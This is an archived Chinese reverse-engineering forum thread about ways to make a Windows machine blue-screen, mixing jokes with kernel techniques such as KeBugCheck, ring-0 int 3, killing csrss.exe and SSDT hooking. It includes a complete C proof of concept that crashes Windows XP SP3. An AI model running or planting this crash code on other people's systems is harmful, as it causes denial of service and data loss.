本论坛为只读模式,仅供查阅,不能注册新用户,不能发帖/回帖,有问题可发邮件 xikug.xp (^) gmail.com
楼主: webxeyes

给个方法怎么把机器搞蓝 [复制链接]

Rank: 1

发表于 2010-10-31 14:22:38 |显示全部楼层
用ExFreePoolWithTag释放UNICODE_STRING类型里的buffer试试

Rank: 3Rank: 3

发表于 2010-11-4 03:19:46 |显示全部楼层
直接拔电源

Rank: 3Rank: 3

发表于 2010-11-5 21:02:41 |显示全部楼层
KeBugCheck 肯定蓝啊。

Rank: 1

发表于 2010-11-6 05:18:10 |显示全部楼层
  1. #include <windows.h>
  2. #include <stdio.h>
  3. //
  4. // Cause INVALID_PROCESS_ATTACH_ATTEMPT KeBugCheck().
  5. // Test on xpsp3.
  6. //
  7. // Published at 0x1337.org, 2010-03-08
  8. //
  9. // pellelindblad <<at>> gmail <<dot>> com
  10. //
  11. int main(int argc, const char *argv[])
  12. {
  13.     PROCESS_INFORMATION pi;
  14.     if(1 == argc)
  15.     {
  16.         STARTUPINFOA si;
  17.         char szProc[MAX_PATH];
  18.         sprintf(szProc, "%s %d", argv[0], GetCurrentProcessId());
  19.         memset(&si, 0, sizeof(si));
  20.         si.cb = sizeof(si);
  21.         if(FALSE == CreateProcessA(NULL, szProc, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, &si, &pi))
  22.         {
  23.             printf("Failed to create debuggee\\n");
  24.             return 0;
  25.         }
  26.     }
  27.     else
  28.     {
  29.         DWORD nProcessId = atoi(argv[1]);
  30.         HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, nProcessId);
  31.         printf("Parent process 0x%08X\\n", nProcessId);
  32.         printf("ProcessB sleeping (so we dont get stuck in dbgmsg)...\\n");
  33.         Sleep(2000);
  34.         if(FALSE == DebugActiveProcess(nProcessId))
  35.         {
  36.             printf("Failed to attach to active process...\\n");
  37.             return 0;
  38.         }
  39.         if(NULL != hProcess)
  40.         {
  41.             TerminateProcess(hProcess, 0);    // b00m.
  42.             CloseHandle(hProcess);
  43.         }
  44.         else
  45.         {
  46.             printf("Failed to open processes\\n");
  47.         }
  48.         return 0;
  49.     }
  50.     for(;;)
  51.     {
  52.         DEBUG_EVENT dbg;
  53.         if(FALSE != WaitForDebugEvent(&dbg, INFINITE))
  54.         {
  55.             printf("Got event 0x%08X...\\n", dbg.dwDebugEventCode);
  56.             ContinueDebugEvent(dbg.dwProcessId, dbg.dwThreadId, DBG_CONTINUE);
  57.         }
  58.     }
  59.     return 0;
  60. }
复制代码

Rank: 3Rank: 3

发表于 2010-11-9 01:08:34 |显示全部楼层
把 QQ 和 360 放在一起就会蓝了。

Rank: 1

发表于 2010-12-18 01:49:31 |显示全部楼层
int 3 试试

Rank: 1

发表于 2010-12-18 11:32:24 |显示全部楼层
1.往不存在的地址写点东西
2.天空蓝立邦漆

Rank: 3Rank: 3

发表于 2010-12-18 18:18:02 |显示全部楼层
天空蓝立邦[quote=\"yn23724002\"]1.往不存在的地址写点东西
2.天空蓝立邦漆[/quote]

第2条很猛。。。

Rank: 1

发表于 2010-12-26 03:10:20 |显示全部楼层
在非调试模式  驱动里面执行int 3   肯定蓝!

Rank: 1

发表于 2010-12-27 21:49:50 |显示全部楼层
调用MesaageBoxA 写内核内存

Rank: 1

发表于 2010-12-28 14:47:23 |显示全部楼层
http://sucsor.itpub.net/post/3669/283268
M$官方的方案。

Rank: 1

发表于 2011-1-18 20:34:42 |显示全部楼层
ntkrnlpa.exe 干掉,应该能蓝。

Rank: 2

发表于 2011-1-19 14:14:47 |显示全部楼层
还原代码,恢复钩子,再XX

Rank: 1

发表于 2011-1-20 18:01:53 |显示全部楼层
我的给你个方法,直接修改SSDT,HOOK他,然后把跳转的地址还是修改成他的..
或者inline HOOK,调用自己的函数..里面随便写入点儿乱指令然后调用一个R0下的函数。。。
不蓝只能说你机器成仙了..免疫功能太强,,,

Rank: 1

发表于 2011-1-20 20:30:50 |显示全部楼层
http://www.debugman.com/discussion/2762
……

Rank: 1

发表于 2011-1-27 00:34:29 |显示全部楼层
1.把csrss.exe结束
2.重复加载ntoskrnl.exe
3.在ring0  _asm int3
任选

Rank: 1

发表于 2011-1-27 12:31:22 |显示全部楼层
http://tech.sina.com.cn/s/2008-01-10/08521965225.shtml

Rank: 1

发表于 2011-4-2 02:53:18 |显示全部楼层
亲测 Nooby的代码 xp sp3 可用

Rank: 1

发表于 2011-4-3 01:18:31 |显示全部楼层
最简单的方法,memcpy,百事百蓝。。
您需要登录后才可以回帖 登录 | 立即加入

Archiver|手机版|第8个男人 - 论坛为只读模式,仅供查阅

GMT+8, 2019-6-27 13:20 , Processed in 0.030519 second(s), 6 queries .

Design by pvo.cn

© 2011 Pvo Inc.

回顶部